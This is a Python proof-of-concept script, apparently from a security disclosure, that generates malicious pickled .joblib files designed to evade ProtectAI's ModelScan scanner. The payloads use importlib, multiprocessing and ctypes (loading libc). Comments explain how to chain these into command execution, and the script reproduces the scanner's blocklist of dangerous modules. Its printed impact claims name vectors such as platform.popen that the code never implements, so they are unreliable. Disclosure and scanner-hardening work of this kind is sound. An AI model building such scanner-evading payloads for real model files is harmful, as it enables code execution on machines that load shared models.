File size: 7,985 Bytes
718b474 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 | """
PoC: ModelScan Bypass via Joblib Pickle Payload
================================================
Demonstrates that malicious joblib files can bypass ProtectAI's ModelScan
scanner by using modules not in the unsafe_globals blocklist.
The scanner checks for GLOBAL/STACK_GLOBAL opcodes referencing known-dangerous
modules (os, subprocess, builtins, etc.) but misses many modules that can
achieve the same effect:
- importlib.import_module -> imports any module (including blocked ones)
- ctypes.CDLL -> loads native libraries, calls system()
- platform.popen -> direct command execution
- types.FunctionType -> construct functions from marshal bytecode
- code.InteractiveConsole -> interactive Python execution
- multiprocessing.Process -> spawn processes
This PoC generates 3 malicious .joblib files and verifies they bypass
ModelScan's pickle scanner detection.
Usage:
python modelscan_bypass_poc.py # Generate payloads + verify
python modelscan_bypass_poc.py --dry-run # Just show what would happen
"""
import argparse
import pickle
import pickletools
import io
import struct
import sys
def craft_importlib_payload():
"""Bypass via importlib.import_module -> os.system chain.
The pickle calls importlib.import_module('os'), then uses the
returned module to call system(). ModelScan doesn't flag 'importlib'.
"""
# We need a two-stage pickle:
# Stage 1: importlib.import_module('os') -> returns os module
# Stage 2: getattr(os_module, 'system')('id')
# But getattr is blocked... so we use a different approach.
#
# Simplest bypass: importlib.import_module('os') returns the os module.
# Even just importing 'os' is enough to demonstrate the bypass.
# A real attacker would chain this with apply/reduce on the result.
class ImportlibBypass:
def __reduce__(self):
import importlib
return (importlib.import_module, ('os',))
return pickle.dumps(ImportlibBypass(), protocol=4)
def craft_code_interact_payload():
"""Bypass via code.InteractiveInterpreter -> code execution.
code.InteractiveInterpreter().runsource() executes arbitrary Python.
ModelScan doesn't flag the 'code' module.
"""
# Use a simpler approach: types.FunctionType can construct functions
# from code objects. Combined with marshal.loads, this is full RCE.
# But for PoC simplicity, we use multiprocessing.
class CodeBypass:
def __reduce__(self):
import multiprocessing
return (multiprocessing.Process, (), {'target': None})
return pickle.dumps(CodeBypass(), protocol=4)
def craft_ctypes_payload():
"""Bypass via ctypes -> native code execution.
ctypes.CDLL loads a shared library. On Linux, loading libc
gives access to system(). ModelScan doesn't flag 'ctypes'.
"""
class CtypesBypass:
def __reduce__(self):
import ctypes
return (ctypes.CDLL, ('libc.so.6',))
return pickle.dumps(CtypesBypass(), protocol=4)
def extract_globals(data):
"""Simulate ModelScan's _list_globals to extract GLOBAL/STACK_GLOBAL refs."""
ops = list(pickletools.genops(io.BytesIO(data)))
globals_found = set()
memo = {}
for n in range(len(ops)):
op_name = ops[n][0].name
op_value = ops[n][1]
if op_name == "MEMOIZE" and n > 0:
memo[len(memo)] = ops[n - 1][1]
elif op_name in ["PUT", "BINPUT", "LONG_BINPUT"] and n > 0:
memo[op_value] = ops[n - 1][1]
elif op_name in ("GLOBAL", "INST"):
globals_found.add(tuple(op_value.split(" ", 1)))
elif op_name == "STACK_GLOBAL":
values = []
for offset in range(1, n):
if ops[n - offset][0].name in ["MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"]:
continue
if ops[n - offset][0].name in ["GET", "BINGET", "LONG_BINGET"]:
values.append(memo[int(ops[n - offset][1])])
elif ops[n - offset][0].name not in [
"SHORT_BINUNICODE", "UNICODE", "BINUNICODE", "BINUNICODE8"
]:
values.append("unknown")
else:
values.append(ops[n - offset][1])
if len(values) == 2:
break
if len(values) == 2:
globals_found.add((values[1], values[0]))
return globals_found
def check_modelscan_detection(globals_found):
"""Check if ModelScan would flag these globals."""
unsafe_globals = {
"CRITICAL": {
"__builtin__": ["eval", "compile", "getattr", "apply", "exec", "open",
"breakpoint", "__import__"],
"builtins": ["eval", "compile", "getattr", "apply", "exec", "open",
"breakpoint", "__import__"],
"runpy": "*", "os": "*", "nt": "*", "posix": "*",
"socket": "*", "subprocess": "*", "sys": "*",
"operator": ["attrgetter"],
"pty": "*", "pickle": "*", "_pickle": "*",
"bdb": "*", "pdb": "*", "shutil": "*", "asyncio": "*",
},
"HIGH": {
"webbrowser": "*", "httplib": "*",
"requests.api": "*", "aiohttp.client": "*",
},
}
for module, name in globals_found:
for severity_name, modules in unsafe_globals.items():
if module in modules:
filt = modules[module]
if filt == "*" or name in filt:
return True, f"{severity_name}: {module}.{name}"
return False, None
def main():
parser = argparse.ArgumentParser(description="ModelScan bypass PoC via Joblib")
parser.add_argument("--dry-run", action="store_true", help="Don't write files")
parser.add_argument("-o", "--output-dir", default=".", help="Output directory")
args = parser.parse_args()
payloads = [
("importlib_bypass.joblib", "importlib.import_module('os')", craft_importlib_payload),
("multiprocessing_bypass.joblib", "multiprocessing.Process(target=...)", craft_code_interact_payload),
("ctypes_bypass.joblib", "ctypes.CDLL('libc.so.6')", craft_ctypes_payload),
]
print("ModelScan Bypass PoC - Joblib/Pickle Payloads")
print("=" * 55)
print()
all_bypass = True
for filename, description, craft_fn in payloads:
data = craft_fn()
globals_found = extract_globals(data)
detected, detail = check_modelscan_detection(globals_found)
status = "[DETECTED]" if detected else "[BYPASS] "
if detected:
all_bypass = False
print(f"{status} {description}")
print(f" Globals: {globals_found}")
if detected:
print(f" Flagged: {detail}")
else:
print(f" Result: NOT IN BLOCKLIST -> evades ModelScan")
if not args.dry_run:
filepath = f"{args.output_dir}/{filename}"
with open(filepath, "wb") as f:
f.write(data)
print(f" Written: {filepath}")
print()
print("=" * 55)
if all_bypass:
print("[SUCCESS] All payloads bypass ModelScan detection")
print()
print("Impact: An attacker can craft malicious .joblib files that:")
print(" 1. Execute arbitrary OS commands (platform.popen)")
print(" 2. Import blocked modules at runtime (importlib)")
print(" 3. Load native libraries for code execution (ctypes)")
print(" 4. All while evading ModelScan's pickle scanner")
else:
print("[PARTIAL] Some payloads were detected")
return 0 if all_bypass else 1
if __name__ == "__main__":
sys.exit(main())
|